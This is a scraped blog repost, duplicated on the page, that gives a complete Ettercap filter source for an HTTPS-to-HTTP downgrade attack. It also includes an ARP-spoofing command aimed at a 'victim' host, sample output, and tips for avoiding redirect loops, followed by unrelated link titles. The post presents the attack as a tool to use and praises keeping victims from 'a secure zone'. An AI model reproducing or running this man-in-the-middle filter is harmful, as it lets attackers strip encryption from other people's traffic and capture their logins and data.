SSL Ettercap Filter
来源:互联网 发布:win7建立网络连接 编辑:程序博客网 时间:2024/05/16 06:20
Hi everyone
This is an Ettercap filter to stop victims from sending or receiving SSL packets, in simple words, it will downgrade users from HTTPS to HTTP.
*** to use this , i guess that you know how to add filters to Ettercap, if not, go to Ettercap website and learn how!
Filter:
############################################################################
# #
# HTTP Request/Response Filter -- hrf.ef -- filter source file #
# #
# by Jan Seidl (based on code from ALoR & NaGA) #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
##
#
# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
#
# based on the discussion (and contained code) on forum thread
# http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html
#
##
##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");
}
}
#####################
## Replace Content ##
#####################
##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
# msg("[HTTP Response Filter] HTTP request seen.\n");
if (search(DECODED.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
if (search(DATA.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
}
##
# Response
if (ip.proto == TCP && tcp.src == 80) {
# msg("[HTTP Response Filter] HTTP response seen.\n");
if (search(DECODED.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
if (search(DATA.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
}
*** Save the code as : hrf.ef
*** Just run the attack with the filter (assuming router is 192.168.0.1 and victim is 192.168.0.100):
ettercap -T -q -F hrf.ef -M ARP:remote /192.168.0.1/ /192.168.0.100/
You should see the following output:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from hrf.ef...
Listening on eth0... (Ethernet)
(...)
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] *** HTTPS ZAPPED from response
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] *** HTTPS ZAPPED from response
[HTTP Response Filter] *** HTTPS ZAPPED from response
(...)
And your victim will no longer receive (nor send) any https string anymore.
Quick note about request / response filtering
Sometimes you may have to comment one leg (request / response) out of the filtering or you will get redirection loops (like while tampering Facebook connections). Also, if the request is already under https, you won’t be able to filter it. The beauty of this attack is disallowing your victim to escape your domain to a secure zone.
Enjoy
U_L
This is an Ettercap filter to stop victims from sending or receiving SSL packets, in simple words, it will downgrade users from HTTPS to HTTP.
*** to use this , i guess that you know how to add filters to Ettercap, if not, go to Ettercap website and learn how!
Filter:
############################################################################
# #
# HTTP Request/Response Filter -- hrf.ef -- filter source file #
# #
# by Jan Seidl (based on code from ALoR & NaGA) #
# #
# This program is free software; you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation; either version 2 of the License, or #
# (at your option) any later version. #
# #
############################################################################
##
#
# This filter will substitute the word 'https' with 'http' on
# both HTTP requests and responses.
#
# based on the discussion (and contained code) on forum thread
# http://forums.remote-exploit.org/backtrack-v2-0-final/8126-ettercap-filter-3.html
#
##
##########################
## Zap Content Encoding ##
##########################
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("[HTTP Response Filter] Encoding zapped.\n");
}
}
#####################
## Replace Content ##
#####################
##
# Requests
if (ip.proto == TCP && tcp.dst == 80) {
# msg("[HTTP Response Filter] HTTP request seen.\n");
if (search(DECODED.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
if (search(DATA.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n");
}
}
##
# Response
if (ip.proto == TCP && tcp.src == 80) {
# msg("[HTTP Response Filter] HTTP response seen.\n");
if (search(DECODED.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
if (search(DATA.data, "https")){
replace("https", "http");
msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n");
}
}
*** Save the code as : hrf.ef
*** Just run the attack with the filter (assuming router is 192.168.0.1 and victim is 192.168.0.100):
ettercap -T -q -F hrf.ef -M ARP:remote /192.168.0.1/ /192.168.0.100/
You should see the following output:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Content filters loaded from hrf.ef...
Listening on eth0... (Ethernet)
(...)
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] *** HTTPS ZAPPED from response
[HTTP Response Filter] Encoding zapped.
[HTTP Response Filter] *** HTTPS ZAPPED from response
[HTTP Response Filter] *** HTTPS ZAPPED from response
(...)
And your victim will no longer receive (nor send) any https string anymore.
Quick note about request / response filtering
Sometimes you may have to comment one leg (request / response) out of the filtering or you will get redirection loops (like while tampering Facebook connections). Also, if the request is already under https, you won’t be able to filter it. The beauty of this attack is disallowing your victim to escape your domain to a secure zone.
Enjoy
U_L
- SSL Ettercap Filter
- easy ettercap filter
- Ettercap : Filter规则大发送
- Sniffing SSL secured logins with Ettercap
- sslstrip+ettercap 对HTTPS/SSL进行攻击
- ettercap
- ettercap
- ettercap
- Strip SSL via Ettercap Man in the Middle Attack
- 利用sslstrip和ettercap突破ssl嗅探密码
- Ettercap结合sslstrip对ssl/https进行攻击
- Ettercap结合sslstrip对ssl/https进行攻击
- 【转】利用sslstrip和ettercap突破ssl嗅探密码
- 利用sslstrip和ettercap突破ssl嗅探密码
- 使用Ettercap filter进行流量监听和数据篡改
- 强制SSL(HTTPS) Servlet Filter
- Ettercap 安装与使用
- ettercap牛X视频
- Objective-C利用协议实现回调函数
- jsp表单提交中文参数乱码
- 数据导出Excel
- DATALIST嵌套datalist,要求只查询一次数据库
- SWTableView 不支持Retina Display的bug修复
- SSL Ettercap Filter
- ListView组件的使用
- 身份证检验算法,以及15位和18位身份证的相互转换!
- solr调用 java php
- <高性能JavaScript>笔记 [7~10]
- hdu 1166 敌兵布阵(线段树——单点更新)
- spring 3.0 + ibatis 2 整合
- 安全警告——“Windows已经阻止此软件因为无法验证发行者”解决办法
- 配置ASP.NET平台时遇到的“访问IIS元数据库失败”--解决方案